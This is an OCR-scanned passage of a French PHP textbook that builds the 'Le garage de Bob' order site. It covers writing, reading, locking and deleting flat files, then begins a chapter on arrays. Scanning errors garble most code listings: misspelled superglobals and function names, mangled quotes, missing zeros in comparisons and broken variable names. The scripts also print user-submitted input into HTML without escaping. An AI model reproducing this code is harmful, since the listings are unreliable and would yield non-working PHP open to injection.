20:42, le 31-03 1 pneus bidons d'huile bougies 100.00 € 33 grande rue, Toulouse 
20:43, le 31-03 pneus 1 bidons d'huile 4 bougies 26.00 € 27 rue des acacias, Bordeaux 



Fermeture d'un fichier 

Lorsque vous en avez fini avec un fichier, vous devez le fermer au moyen de la fonction 
f close( ) : 

fclose($fp) ; 

La fonction f close ( ) renvoie la valeur true si la fermeture du fichier a reussi, ou false 
en cas d'echec. Le risque d'echec etant moins grand pour une operation de fermeture de 
fichier que pour une operation d'ouverture, nous avons choisi ici de ne pas verifier cette 
operation. 

Le listing complet de la version finale de processorder.php est presente dans le 
Listing 2.2. 

Listing 2.2 : processorder.php — Version finale du script de traitement des commandes 

<?php 

// Cree des noms de variables abregees 
$qte_pneus = $_P0ST[ ' qte_pneus ' ] ; 
$qte_huiles = $_P0ST[ 1 qte_huiles 1 ] ; 
$qte_bougies = $_POST[ ' qte_bougies ' ] ; 
$adresse = $_P0ST[ 1 adresse ' ] ; 

$D0CUMENT_R00T = $_SERVER[ ' DOCUMENT_ROOT ' ] ; 

?> 

<html> 
<head> 

<title>Le garage de Bob - Resultats de la commande</title> 
</head> 
<body> 
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<h1>Le garage de Bob</h1> 
<h2>Resultats de la commande</h2> 
<?php 

$date = date('H:i, \l\e j-m-Y'); 
echo ' <p>Commmande traitee a '; 
echo $date; 
echo '</p>' ; 

echo ' <p>Recapitulatif de votre commande :</p>'; 
$qte_totale = 0; 

$qte_totale = $qte_pneus + $qte_huiles + $qte_bougies; 
echo 'Articles commandes : '. $qte_totale . '<br />'; 

if( $qte_totale == 0) 
{ 

echo "Vous n'avez rien commande !<br />"; 
} 

else 
{ 

if ( $qte_pneus > ) 

echo $qte_pneus . ' pneus<br />'; 
if ( $qte_huiles > ) 

echo $qte_huiles . " bidons d'huile<br />"; 
if ( $qte_bougies > ) 

echo $qte_bougies .' bougies<br />'; 

} 

$montant_total = 0.00; 

define ( 'PRIX_PNEUS' , 100); 
define ( 1 PRIX_HUILES ' , 10); 
define ( ' PRIX_BOUGIES' , 4); 

$montant_total = $qte_pneus * PRIX_PNEUS 

+ $qte_huiles * PRIX_HUILES 
+ $qte_bougies * PRIX_BOUGIES; 

$montant_total = number_f ormat ($montant_total, 2, ' '); 

echo '<p>Total de la commande : ' . $montant_total . '</p>'; 
echo '<p>Adresse de livraison : ' . $adresse . '</p>'; 

$chaine_sortie = "$date\t$qte_pneus pneus\t$qte_huiles bidons " . 

"d ' huile\t$qte_bougies bougies\t$montant_total €\t" . 
"$adresse\n" ; 

// Ouverture du fichier en mode ajout 

@ $fp = fopen("$DOCUMENT_ROOT/. ./orders/orders. txt", 'ab'); 

if (!$fp) 
{ 

echo ' <p><strong>Nous ne pouvons pas traiter votre commande ' . 
'pour le moment. Reessayez plus tard.</strong></p>' . 
' </body></html> ' ; 

exit; 
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} 

fwrite($fp, $chaine_sortie, strlen($chaine_sortie) ) ; 
f close($f p) ; 

echo ' <p>Commande sauvegardee.</p>' ; 

?> 

</body> 
</html> 



Lecture dans un fichier 

A ce stade de notre projet modele, les clients de Bob peuvent transmettre leurs 
commandes via le Web, mais pour que les employes puissent traiter ces commandes ils 
doivent pouvoir ouvrir les fichiers qui les contiennent. Nous allons done creer une inter- 
face web qui permettra aux employes de lire facilement ces fichiers. Le code de cette 
interface est presente dans le Listing 2.3. 

Listing 2.3 : vieworders.php — Interface web pour I'ouverture et la lecture des fichiers 



<?php 

//creation du nom de variable abrege 
$D0CUMENT_R00T = $_SERVER[ ' D0CUMENT_R00T ' ] ; 

?> 

<html> 
<head> 

<title>Le garage de Bob - Commandes des clients</title> 
</head> 
<body> 

<h1>Le garage de Bob</h1> 
<h2>Commandes des clients</h2> 
<?php 

@$fp = fopen("$DOCUMENT_ROOT/. ./orders/orders. txt", ' rb ' ) ; 
if (!$fp) 

echo ' <p><strong>Aucune commande en attente.' 

. 'Essayez plus tard.</strong></p>' ; 
exit ; 



while ( !feof ($fp) ) 

$commande = fgets($fp, 999); 
echo $commande .'<br />'; 



fclose($f p) ; 

?> 

</body> 
</html> 
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Ce script met en oeuvre la serie d'operations evoquee precedemment : ouverture du 
fichier, lecture dans le fichier et fermeture du fichier. Son execution avec le fichier de 
donnees decrit dans le Listing 2.1 produit le resultat montre a la Figure 2.4. 



Le garage de Bob - Commanded des clients 
( -4 | ► ') ■' (OJ (Xj ( lj hir.p://localhosi Hacoftj Q " (EK cC (M) ©- 

Le garage de Bob 

Commandes des clients 

20:30, lc 31-03 4 pneus 1 bidons dhuilc & bougies 434.00E22 ruede lapompc, Paris 
20:42, 1c 31-03 1 pneus bidons dhuilcO bougies 100.00E 33 grandc rue, Toulouse 
20:43, lc 31-03 pneus 1 bidons dhuilc 4 bougies 26.00E27 rue des acacias, Bordeaux 



TermJne 



Examinons en detail les differentes fonctions utilisees dans ce script. 
Ouverture d'un fichier en lecture : fopen() 

La aussi, l'ouverture du fichier s'effectue au moyen de la fonction fopen(). Dans ce 
cas, toutefois, on utilise le mode " rb " pour indiquer a PHP que le fichier doit etre ouvert 
en lecture seule : 

$fp = f open ("$D0CUMENT_R00T/. ./orders/orders. txt", 'rb'); 

Determination du moment ou doit s'arreter la lecture : feof() 

Dans le Listing 2.3, on se sert d'une boucle while pour lire le fichier jusqu'a la fin. 
Cette boucle teste si la fin du fichier est atteinte au moyen de la fonction f eof ( ) : 

while ( !feof($fp) ) 

La fonction f eof ( ) prend comme seul parametre un descripteur de fichier et renvoie 
true si ce descripteur est positionne a la fin du fichier. Le terme f eof est l'abreviation 
de 1' expression "File End Of File" (fichier fin de fichier). 

Dans notre exemple (comme en general dans toutes les situations de lecture dans un 
fichier), la lecture du contenu se poursuit jusqu'a rencontrer la fin du fichier (EOF). 

Lecture d'une ligne a la fois : fgets(), fgetss() et fgetcsv() 

Dans le Listing 2.2, on lit le contenu du fichier a l'aide de la fonction f gets ( ) : 

$commande= fgets($fp, 999); 

La fonction fgets() lit une ligne a la fois dans un fichier. Dans notre exemple, la 
lecture se poursuit jusqu'a ce que l'interpreteur rencontre un caractere de nouvelle ligne 



i-igure z.4 

/.'execution du script 
vieworders.php affiche 
dans la fenetre du navi- 
gateur web toutes les 
commandes enregistrees 
dans le fichier orders.txt. 
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(\n), EOF ou jusqu'a ce que 998 octets aient ete lus dans le fichier. Le nombre maximal 
d'octets lus est la longueur indiquee en deuxieme parametre, moins un. 

Vous disposez de plusieurs fonctions pour lire le contenu d'un fichier. La fonction 
fgets( ) convient bien pour les fichiers au format texte seul qui doivent etre traites par 
morceaux. 

La fonction fgetss () constitue une variante interessante de la fonction fgets(). Son 
prototype est le suivant : 

string fgetss ( resource fp, int longueur, string [balises_autorisees]) ; 

fgetss() est tres semblable a fgets(), si ce n'est qu'elle supprime toutes les balises 
PHP et HTML contenues dans la chaine lue. Pour empecher la suppression de certaines 
balises, il suffit de les enumerer dans la chame balises_autorisees. La fonction 
fgetss ( ) s'utilise par mesure de securite lors de la lecture d'un fichier ecrit par un tiers 
ou contenant des donnees saisies par l'utilisateur. La presence de code HTML dans un 
fichier peut en effet perturber la mise en forme que vous avez soigneusement mise en 
place. Par ailleurs, ne pas verifier la presence de code PHP dans un fichier peut permettre 
a un utilisateur malveillant de prendre le controle de votre serveur. 

La fonction f getcsv ( ) est une autre variante de la fonction f gets ( ) . Voici son proto- 
type : 

array fgetcsv ( resource fp, int longueur [, string delimiteur [, 
string encadrement]]) 

La fonction fgetcsv ( ) s'emploie pour decouper les lignes d'un fichier en fonction d'un 
caractere de delimitation (par exemple un caractere de tabulation comme ici ou une 
virgule comme dans de nombreux fichiers produits par les tableurs et d'autres applica- 
tions), f getscv( ) permet, par exemple, de reconstruire separement les variables d'une 
commande plutot que les traiter sous la forme d'une ligne de texte. Cette fonction 
s'utilise de la meme maniere que f gets ( ) , mais vous devez lui passer en parametre le 
delimiteur utilise pour separer les champs. L'instruction : 

$commande = fgetcsv($fp, 100, "\t"); 

provoque la lecture d'une ligne du fichier et son decoupage selon chaque tabulation 
(\t). Le resultat obtenu est renvoye sous forme de tableau ($commande dans le 
Listing 2.2). Les tableaux sont traites au Chapitre 3. 

La valeur du parametre longueur doit etre choisie de maniere a etre superieure au 
nombre de caracteres de la ligne la plus longue du fichier a lire. 

Le parametre encadrement indique le caractere qui encadre chacun des champs d'une 
ligne. S'il n'est pas precise, il prend comme valeur par defaut l'apostrophe double ( "). 
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Lecture de I'integralite du contenu d'un fichier : readfile(), fpassthru() 
et fileO 

Au lieu de lire un fichier ligne par ligne, vous pouvez lire son contenu d'un seul trait. 
Pour cela, vous disposez de quatre possibilites. 

La premiere methode consiste a utiliser la fonction readf ile ( ) . Le code du Listing 2.2 
peut alors etre remplace par une seule instruction : 

readf ile ( "$D0CUMENT_R00T/ . . /orders/orders . txt " ) ; 

L'appel de la fonction readf ile () ouvre le fichier, affiche son contenu sur la sortie 
standard (le navigateur web), puis ferme le fichier. Cette fonction a le prototype 
suivant : 

int readfile( string nomFichier, [int utiliser include path \ , resource contexte]]) ; 
Le second parametre de la fonction readfile() est facultatif ; il indique si PHP doit 
rechercher le fichier dans le include path. Ce parametre fonctionne de la meme 
maniere que pour la fonction fopen(). Le parametre facultatif contexte n'est utilise 
que lorsque des fichiers sont ouverts a distance, par exemple via HTTP. Nous traiterons 
de cette utilisation plus en detail au Chapitre 18. La fonction readf ile () renvoie le 
nombre total d' octets lus dans le fichier. 

La deuxieme methode pour lire I'integralite d'un fichier consiste a utiliser la fonction 
fpassthru( ). Dans ce cas, vous devez prealablement ouvrir le fichier avec fopen(). 
Vous passez ensuite le descripteur de fichier en parametre a f passthru ( ) , qui renverra 
sur la sortie standard le contenu du fichier compris entre la position du pointeur et la fin 
du fichier. Cette fonction ferme le fichier une fois qu'elle en a termine. 

Le script du Listing 2.2 peut ainsi etre remplace par les deux instructions suivantes : 

$fp = fopen("$D0CUMENT_R00T/. ./orders/orders. txt", 'rb'); 
fpassthru($f p) ; 

Si la lecture reussit, la fonction f passthru ( ) renvoie la valeur true. Elle renvoie false 
en cas d'echec. 

La fonction file () offre une troisieme possibilite de lecture de I'integralite du 
contenu d'un fichier. Cette fonction est identique a readf ile ( ), si ce n'est qu'au lieu de 
diriger le contenu du fichier vers la sortie standard elle le stocke dans un tableau. Nous 
reviendrons sur cette possibilite au Chapitre 3. Notez simplement a ce stade que cette 
fonction s' utilise de la maniere suivante : 

$tab_contenu = f ile($D0CUMENT_R00T/ .. /orders/orders .txt" ) ; 

L' execution de cette instruction provoque l'enregistrement du contenu du fichier dans 
un tableau appele $tab contenu. Chaque ligne du fichier est stockee dans le tableau 
sous la forme d'un element distinct. Avec les anciennes versions de PHP, cette fonction 
n'etait pas compatible avec les formats de fichier binaires. 
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Enfin, la quatrieme possibility consiste a utiliser la fonction file get contents (). 
Cette fonction est identique a readfile(), sauf qu'elle renvoie le contenu du fichier 
sous la forme d'une chame au lieu de 1'afficher dans le navigateur. 

Lecture d'un caractere : fgetcQ 

Le traitement d'un fichier peut egalement consister a lire son contenu caractere par 
caractere, au moyen de la fonction f getc( ). Cette fonction prend comme unique para- 
metre un descripteur de fichier et renvoie le caractere suivant dans ce fichier. Nous 
pouvons remplacer la boucle while du Listing 2.2 par une boucle utilisant f getc ( ) : 

while (!feof($fp)) 
{ 

$car = fgetc($f p) ; 
if (!feof($fp)) 

echo ($car == "\n" ? '<br />' : $car); 

} 

Ce code lit un caractere a la fois dans le fichier, via f getc ( ) , et le stocke dans la variable 
Scar. Le processus se repete jusqu'a ce que la fin du fichier soit atteinte. Les caracteres 
de fin de ligne (\n) sont ensuite remplaces par des sauts de ligne HTML (<br />). 

Ce petit traitement vise simplement a epurer la mise en forme. Si vous essayiez d'affi- 
cher le fichier en laissant les caracteres de nouvelles lignes entre les enregistrements, la 
totalite du fichier serait imprimee sur une seule ligne (vous pouvez essayer par vous- 
meme). En effet, les navigateurs web ignorent les caracteres de nouvelles lignes qu'ils 
considerent comme des espaces : vous devez done les remplacer par des sauts de ligne 
HTML (<br />). Loperateur ternaire permet d'effectuer ce remplacement de facon 
simple et elegante. 

L'utilisation de la fonction f getc ( ) au lieu de la fonction f gets ( ) a une consequence 
mineure : le caractere EOF est renvoye par la fonction f getc ( ) , ce qui n'est pas le cas 
avec la fonction fgets( ). II s'ensuit qu'apres la lecture du caractere il est necessaire 
de tester a nouveau f eof ( ) pour eviter que le caractere EOF ne soit affiche par le navi- 
gateur. 

La lecture d'un fichier caractere par caractere n'a de sens que dans des contextes tres 
particuliers, ou les caracteres doivent etre lus les uns apres les autres. 

Lecture d'une longueur arbitraire : freadQ 

La derniere methode de lecture d'un fichier que nous allons etudier est la fonction 
fread(). Celle-ci permet de lire un nombre quelconque d'octets dans un fichier. 
Le prototype de cette fonction est le suivant : 

string f read ( resource fp, int longueur); 
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Cette fonction lit "longueur" octets ou lit jusqu'a la fin du fichier ou du paquet reseau, 
si celle-ci survient avant que longueur octets aient ete lus. 

Autres fonctions utiles pour la manipulation des fichiers 

PHP offre plusieurs autres fonctions qui peuvent se reveler utiles pour manipuler des 
fichiers. 

Verification de I'existence d'un fichier : file_exists() 

La fonction file exists () permet de determiner si un fichier existe, sans meme 
l'ouvrir. En voici un exemple d' utilisation : 

if (f ile_exists( "$D0CUMENT_R00T/ . . /orders/orders. txt" ) ) 
echo "Des commandes sont en attente de traitement . " ; 

else 

echo "II n'y a pas de commande en attente."; 

Determination de la taille d'un fichier: filesize() 

La fonction filesize() renvoie la taille d'un fichier en octets : 

echo f ilesize( "$D0CUMENT_R00T/ . . /orders/orders . txt " ) ; 

Vous pouvez utiliser cette fonction avec la fonction f read ( ) pour lire tout un fichier (ou 
une fraction d'un fichier) d'un seul trait. Le code du Listing 2.2 pourrait ainsi etre 
remplace par les instructions suivantes : 

$fp = fopen("$DOCUMENT_ROOT/. ./orders/orders. txt", 'rb'); 

echo nl2br(f read($f p, filesize( "$DOCUMENT_ROOT/ .. /orders/orders. txt" ))); 

fclose( $fp ); 

La fonction nl2br() convertit les caracteres \n en sauts de ligne XHTML (<br />) 
dans la sortie. 

Suppression d'un fichier : unlinkQ 

Si vous souhaitez detruire le contenu du fichier de commandes apres l'avoir traite, utilisez 
la fonction unlink ( ) (PHP ne contient pas de fonction denommee "delete") : 

unlink( "$DOCUMENT_ROOT/ . . /orders/orders . txt " ) ; 

Cette fonction renvoie false lorsque le fichier ne peut pas etre supprime, ce qui peut 
arriver si, par exemple, vous n'avez pas les permissions suffisantes ou si le fichier 
n' existe pas. 

Navigation dans un fichier : rewind(), fseek() et ftellQ 

Vous pouvez manipuler et connaitre la position du pointeur dans le fichier au moyen des 
fonctions rewind ( ) , f seek ( ) et f tell ( ) . 
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La fonction rewind ( ) deplace le pointeur de fichier au debut du fichier. La fonction 
f tell ( ) renvoie la position du pointeur dans le fichier, en nombre d'octets comptes 
depuis le debut du fichier. Par exemple, nous pourrions ajouter les lignes suivantes a la 
fin du Listing 2.2, avant l'appel a f close ( ) : 

echo 'La position finale du pointeur de fichier est '. (f tell($f p) ) ; 
echo ' <br /> ' ; 
rewind($f p) ; 

echo "Apres l'appel a rewind(), cette position is " . (ftell($f p) ) ; 
echo ' <br /> ' ; 

Le resultat obtenu a l'execution du script serait alors celui montre a la Figure 2.5. 

Le garage de Bob - Commandes des clients 
(■* | ' ■ J - (_CJ (ji) ( U ' Http://localhoslH-ara/Q-£r O " (EK <M. ) (M) © * 

Le garage de Bob 
Commandes des clients 

20:30, le 31-03 4 pncus 1 bidons driuilc 6 bougie? 434.00E22 ruede lapotnpc, Paris 
20:42, le 31-03 1 pncus bidons d'huilcO bougies 100 OCE 33 grandc rue, Toulouse 
20:43, le 31-03 pncus 1 bidons dliuilc 4 bougies 26.00E27 rue des acacias, Bordeaux 

La position finale du pointeur dc fichier est 279 
Apres l'appel a rewindQ, cette posiiicn est 



Terming ^ 

Figure 2.5 

Apres lecture des commandes, le pointeur de fichier est positionne a la fin du fichier, e'est-a-dire 
a 279 octets par rapport au debut du fichier. L'appel de la fonction rewind replace le pointeur a la 
position 0, e'est-a-dire au debut du fichier. 

La fonction f seek ( ) permet de deplacer le pointeur de fichier a une position specifique 
dans le fichier. Son prototype est le suivant : 

int fseek ( resource fp, int offset [, int depart]) 

L'appel de la fonction fseek () provoque le deplacement du pointeur de fichier f p de 
offset octets par rapport a l'emplacement depart. La valeur par defaut du parametre 
facultatif depart est SEEK SET, ce qui correspond au debut du fichier. Les autres valeurs 
possibles sont SEEK CUR (l'emplacement courant dans le fichier) et SEEK END (la fin du 
fichier). 

L'appel de la fonction rewind ( ) equivaut done a un appel de la fonction f seek( ) avec 
la valeur pour le parametre offset. La fonction f seek( ) peut, par exemple, servir a 
determiner l'enregistrement qui constitue le milieu d'un fichier ou a effectuer une 
recherche dichotomique. Toutefois, si vous avez besoin de realiser ce genre d' operations 
sur un fichier de donnees, il est preferable de recourir a une base de donnees. 
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Verrouillage des fichiers 

Considerons une situation ou deux clients tentent simultanement de commander un 
meme produit (ce cas se produit souvent des lors que les sites connaissent un minimum 
d'affruence). Qu'advient-il lorsqu'un client invoque la fonction f open ( ) et commence a 
saisir sa commande, tandis qu'un autre client appelle lui aussi fopen() et entre des 
donnees ? Quel est alors le contenu final du fichier ? La premiere commande suivie de 
la seconde, ou inversement ? Ou le fichier ne contiendra-t-il qu'une seule des deux 
commandes ? Ou bien encore les deux commandes se melangeront-elles ? La reponse a 
ces questions depend du systeme d' exploitation utilise ; elle est souvent impossible 
a donner. 

Le verrouillage des fichiers permet d'eviter ce type de probleme. Celui-ci est imple- 
mente en PHP par la fonction flock(), qui doit etre appelee apres l'ouverture d'un 
fichier et avant toute lecture ou denture de donnees dans ce fichier. 

La fonction f lock ( ) a le prototype suivant : 

bool flock( resource fp, int operation [, int &blocage_possible]) 

Vous devez passer a la fonction flock ( ) un descripteur de fichier ouvert et une constante 
representant le type de verrouillage voulu. Elle renvoie true lorsque le verrouillage 
reussit et false en cas d'echec. Le troisieme parametre facultatif contiendra la valeur 
true si l'acquisition du verrou entraine le blocage du processus courant (autrement dit, 
s'il doit attendre). 

Le Tableau 2.2 presente les valeurs possibles pour le parametre operation. Ces valeurs 
ayant ete modinees a partir de PHP 4.0.1, nous presentons ici les deux ensembles de 
valeurs possibles. 



Tableau 2.2 : Valeurs possibles pour le parametre operation de la fonction flock() 



Valeur d'operation 


Signification 


LOCK_SH (anciennement 1) 


Verrouillage en lecture. Le fichier peut etre partage avec 




d'autres lecteurs. 


LOCK_EX (anciennement 2) 


Verrouillage en ecriture. Ce type de verrouillage est exclusif : 




le fichier ne peut etre partage. 


LOCKJJN (anciennement 3) 


Libere le verrouillage existant. 


LOCK_NB (anciennement 4) 


Verrouillage non bloquant. 



Pour que f lock( ) serve a quelque chose, vous devez l'utiliser dans tous les scripts qui 
manipulent le fichier a verrouiller. 
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Notez que flock () ne fonctionne pas avec NFS (Network File System) ou d'autres 
systemes de fichiers reseaux. Cette fonction est egalement inoperante avec d'anciens 
systemes de fichiers ne prenant pas en charge les verrous (FAT, par exemple). Sur 
certains des systemes d' exploitation pour lesquels cette fonction est implemented au 
niveau processus, le verrouillage obtenu ne sera pas fiable si vous utilisez une API de 
serveur multithread. 

Pour utiliser les verrous dans notre exemple, nous pouvons modifier processorder.php 
de la maniere suivante : 

$fp = fopen("$DOCUMENT_ROOT/. ./orders/orders. txt", 'ab'); 
flock($fp, LOCK_EX); // verrouillage du fichier en ecriture 
fwrite($fp, $chaine_sortie) ; 

flock($fp, LOCKJJN); // liberation du verrou en ecriture 
fclose($f p) ; 

Vous devez egalement modifier vieworders.php de la maniere suivante : 

$fp = fopen("$DOCUMENT_ROOT /.. /orders/orders . txt " , ' rb ' ) ; 
flock($fp, LOCK_SH); // verrouillage du fichier en lecture 
// Lecture du fichier 

flock($fp, LOCKJJN); // liberation du verrou en lecture 
fclose($f p) ; 

Grace aux modifications que nous venons d'apporter a notre exemple, notre code est un 
peu plus fiable, mais il ne Test pas encore suffisamment. Que se passera-t-il si deux 
scripts tentent simultanement d'acquerir un verrou? II s'ensuivra une situation de 
concurrence dont Tissue ne peut pas etre determinee. Ce cas de figure peut se reveler 
problematique et etre evite par l'emploi d'un SGBD (systeme de gestion de base de 
donnees). 

Une meilleure solution : les systemes de gestion de base de donnees 

Jusqu'a present, tous les exemples consideres utilisaient des fichiers plats. Dans la 
deuxieme partie de ce livre, nous verrons comment utiliser MySQL, un systeme de 
gestion de base de donnees relationnelle (SGBDR). 

Problemes poses par I'usage de fichiers plats 

L' utilisation de fichiers plats pose divers problemes : 

■ Des lors qu'un fichier devient volumineux, sa manipulation peut se reveler tres 
lente. 

■ La recherche d'un enregistrement ou d'un ensemble d'enregistrements dans un 
fichier plat est une operation difficile. Lorsque les enregistrements sont ordon- 
nes, il est possible de mettre en oeuvre une procedure de recherche tenant compte 
des longueurs fixes des champs pour effectuer une recherche sur un champ cle. 
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Seulement, si vous voulez trouver des motifs d'information (par exemple lister tous 
les clients qui vivent a Paris), il vous faudra lire chaque enregistrement et le verifier 
individuellement. 

1 1 La gestion des acces concurrents est problematique. Nous avons vu comment 
verrouiller des fichiers, mais nous avons egalement mentionne le risque persistant 
de situation concurrentielle. Des acces concurrents peuvent egalement etre a 
l'origine de goulots d'etranglements. Si le trafic sur le site prend de l'ampleur, il 
peut arriver que de nombreux utilisateurs aient a attendre le deverrouillage du 
fichier pour valider leur commande. De trop longues attentes font fuir les clients. 

■ Dans toutes les manipulations de fichiers decrites jusqu'ici, les traitements etaient 
mis en ceuvre de facon sequentielle, c'est-a-dire en partant du debut du fichier et en 
parcourant le contenu du fichier jusqu' a la fin. S'il apparait necessaire d'inserer ou 
de supprimer des enregistrements a partir du milieu du fichier (acces direct), le 
mode de traitement sequentiel peut poser probleme : il implique de lire et de placer 
en memoire l'integralite du fichier, d'apporter les modifications et de reecrire a 
nouveau le fichier. La charge du traitement peut alors devenir tres lourde avec des 
fichiers de donnees volumineux. 

■ Au-dela de la limite offerte par les permissions sur les fichiers, il n'existe pas de 
moyen simple d'implementer des niveaux d' acces differents aux donnees. 

La solution apportee par les SGBDR a ces problemes 

Les systemes de gestion de base de donnees relationnelle (SGBDR) apportent des solutions 
a tous les problemes evoques plus haut : 

■ lis permettent d'acceder bien plus rapidement aux donnees. MySQL, le SGBDR 
etudie dans cet ouvrage, est apparu comme le plus rapide du marche. 

■ lis peuvent etre facilement interroges afin d'en extraire des ensembles de donnees 
repondant a des criteres specifiques. 

■ lis integrent des mecanismes prenant en charge les acces concurrents, ce qui 
dispense le programmeur de s'en preoccuper. 

■ lis permettent un acces direct aux donnees. 

■ lis comprennent des systemes de privileges integres. MySQL est particulierement 
performant dans ce domaine. 

Le principal avantage d'un SGBDR est que toutes (ou presque) les fonctionnalites 
requises pour un systeme de stockage des donnees sont deja implementees. Vous 
pouvez bien sur ecrire votre propre bibliotheque de fonctions PHP, mais pourquoi rein- 
venter la roue ? 
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Dans la Partie II de cet ouvrage, "Utilisation de MySQL", nous examinerons le fonc- 
tionnement des bases de donnees relationnelles en general et nous verrons plus specifi- 
quement comment configurer et utiliser MySQL pour creer des sites web reposant sur 
des bases de donnees. 

Si vous mettez en place un systeme simple et que vous ne pensiez pas avoir besoin 
d'une base de donnees sophistiquee, tout en souhaitant eviter le verrouillage et les 
autres problemes lies a l'utilisation d'un fichier plat, il peut etre interessant de conside- 
rer l'extension SQLite de PHP. Cette extension fournit une interface SQL vers les 
fichiers plats. Dans ce livre, nous traiterons principalement de l'utilisation de MySQL. 
Pour plus d' informations sur SQLite, consultez les sites http://sqlite.org/ et http:// 
www.php.net/sqlite. 

Pour aller plus loin 

Pour plus d' informations sur l'interaction avec le systeme de fichiers, vous pouvez vous 
reporter directement au Chapitre 17. Ce chapitre explique comment modifier les 
permissions et les noms de fichiers, comment travailler avec les repertoires et comment 
interagir avec l'environnement du systeme de fichiers. 

Vous pouvez egalement consulter la section du manuel en ligne de PHP (http:// 
fr2.php.net/filesystem) consacree au systeme de fichier. 

Pour la suite 

Au cours du Chapitre 3, nous etudierons les tableaux et nous verrons comment les utiliser 
pour traiter des donnees dans des scripts PHP. 
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Ce chapitre montre comment utiliser une construction de programmation importante : 
les tableaux. Les variables examinees dans les chapitres precedents etaient de type 
scalaire, c'est-a-dire qu'elles ne stockaient chacune qu'une seule valeur. Un tableau, en 
revanche, est une variable stockant un ensemble ou une serie de valeurs. Un meme 
tableau peut contenir de nombreux elements, chacun d'eux pouvant etre une valeur 
unique, comme un texte ou un nombre, ou un autre tableau. Un tableau comprenant 
d'autres tableaux est dit "multidimensionnel". 

PHP supporte les tableaux indices par des nombres et les tableaux associatifs. Les 
tableaux indices par des nombres devraient vous etre familiers si vous avez deja utilise 
un langage de programmation. En revanche, vous n'avez peut-etre jamais vu de 
tableaux associatifs, bien que vous ayez pu rencontrer ailleurs des choses similaires, 
comme les mappages, les hachages ou les dictionnaires. Les tableaux associatifs 
permettent d'indicer les elements par des valeurs plus significatives que des nombres : 
des mots, par exemple. 

Dans ce chapitre, nous poursuivrons la construction de 1' application du garage de Bob 
commencee dans les chapitres precedents, en nous servant de tableaux pour faciliter la 
manipulation des informations repetitives comme les commandes des clients. L'usage 
de tableaux nous permettra d'ecrire un code plus concis pour realiser certaines des 
operations sur les fichiers du Chapitre 2. 

Qu'est-ce qu'un tableau ? 

Nous avons etudie les variables scalaires au Chapitre 1. Une variable scalaire est un 
emplacement de la memoire designe par un nom et dans lequel peut etre stockee une 
valeur. De la meme maniere, un tableau est un emplacement de la memoire designe par 
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un nom et dans lequel peut etre enregistre un ensemble de valeurs. Un tableau permet 
par consequent de regrouper des valeurs scalaires. 

Dans l'application du garage de Bob dont nous avons commence 1' elaboration, nous 
utiliserons un tableau pour stocker la liste des articles vendus. La Figure 3.1 montre une 
liste de trois articles regroupes dans un tableau nomine $produits (nous verrons un peu 
plus loin comment creer une telle variable). 



Pneus 



Huiles 



Bougies 



produit 



Figure 3. 1 

Les articles vendus par I'entreprise de Bob peuvent etre enregistres dans un tableau. 



Des lors que des informations sont enregistrees dans un tableau, elles peuvent etre 
soumises a diverses manipulations tres interessantes. C'est ainsi qu'avec les construc- 
tions de boucles derates au Chapitre 1 , vous pouvez vous simplifier la tache en eff ec- 
tuant les memes actions sur chacune des valeurs du tableau. L' ensemble des 
informations enregistrees dans un tableau peut etre manipule comme s'il s'agissait 
d'une seule entite. Ainsi, avec une simple ligne de code, toutes les valeurs d'un tableau 
peuvent etre passees a une fonction. Pour, par exemple, trier les articles de Bob par 
ordre alphabetique, il nous suffira de passer le tableau qui les contient a la fonction 
sort(). 

Les valeurs stockees dans un tableau sont appelees elements du tableau. A chaque 
element d'un tableau est associe un indice (egalement appele cle) qui permet d'acceder 
a cet element. 

Dans la plupart des langages de programmation, les tableaux ont des indices numeriques 
qui commencent generalement a ou a 1 . 

PHP permet d'utiliser des nombres ou des chaines comme indices de tableau. Vous 
pouvez utiliser des tableaux indices par des nombres, selon la maniere traditionnelle, ou 
choisir les valeurs que vous souhaitez pour les cles, afin de rendre 1' indexation plus 
comprehensible et utile. Vous avez peut-etre d'ailleurs deja employe cette technique si 
vous avez utilise des tableaux associatifs, des mappages, des hachages ou des diction- 
naires dans d'autres langages de programmation. L'approche peut varier legerement 
selon que vous utilisez des tableaux classiques indices par des nombres ou tableaux 
indices par des valeurs personnalisees. Nous commencerons cette etude par les 
tableaux a indices numeriques avant de passer aux cles defmies par l'utilisateur. 
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Tableaux a indices numeriques 

Ce type de tableau existe dans la plupart des langages de programmation. En PHP, les 
indices commencent par defaut a zero, mais cette valeur initiale peut etre modifiee. 

Initialisation des tableaux a indices numeriques 

Pour creer le tableau montre a la Figure 3.1, utilisez la ligne de code suivante : 

$produits = array ( 'Pneus', 'Huiles', 'Bougies' ); 

Cette instruction cree un tableau $produits contenant les trois valeurs 'Pneus', 
'Huiles' et 'Bougies'. Notez que, comme echo, array() est une construction du 
langage plutot qu'une fonction. 

Selon le contenu a enregistrer dans un tableau, il n'est pas forcement necessaire 
d'initialiser manuellement ce contenu comme on l'a fait dans 1' instruction precedente. 

Si les donnees a placer dans un tableau sont deja contenues dans un autre tableau, il 
suffit de copier un tableau dans l'autre au moyen de l'operateur =. 

Une serie de nombres croissants peut etre automatiquement enregistree dans un tableau 
grace a la fonction range ( ) , qui se charge elle-meme de creer le tableau requis. La ligne 
qui suit cree un tableau $nombres dont les elements sont les nombres entiers compris 
entre 1 et 10 : 

$nombres = range(1,10); 

La fonction range ( ) possede un troisieme parametre facultatif qui vous permet de defi- 
nir la taille du pas entre les valeurs. Par exemple, pour creer un tableau des nombres 
impairs compris entre 1 et 10, procedez de la maniere suivante : 

$impairs = range(1, 10, 2); 

La fonction range ( ) peut egalement etre utilisee avec des caracteres, comme dans cet 
exemple : 

$lettres = range('a', 'z'); 

Lorsque des informations sont contenues dans un fichier stocke sur disque, le tableau 
peut etre directement charge a partir du fichier. Nous reviendrons sur ce point un peu 
plus loin dans ce chapitre, dans la section "Chargement de tableaux a partir de fichiers". 

Lorsque des informations sont contenues dans une base de donnees, le tableau peut 
etre directement charge a partir de la base de donnees. Cette possibility est traitee au 
Chapitre 1 1 . 

PHP offre egalement diverses fonctions permettant d'extraire des parties d'un tableau 
ou de reorganiser les elements. Certaines de ces fonctions seront decrites plus loin dans 
ce chapitre, dans la section "Autres manipulations de tableaux". 
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Acces au contenu des tableaux 

L acces au contenu d'une variable implique d'indiquer le nom de cette variable. Pour 
acceder au contenu d'une variable de type tableau, vous devez utiliser le nom de la 
variable et une cle (ou un indice). La cle ou l'indice indique les valeurs stockees 
auxquelles vous voulez acceder. La cle ou l'indice doivent etre specifies entre crochets, 
juste apres le nom de la variable. 

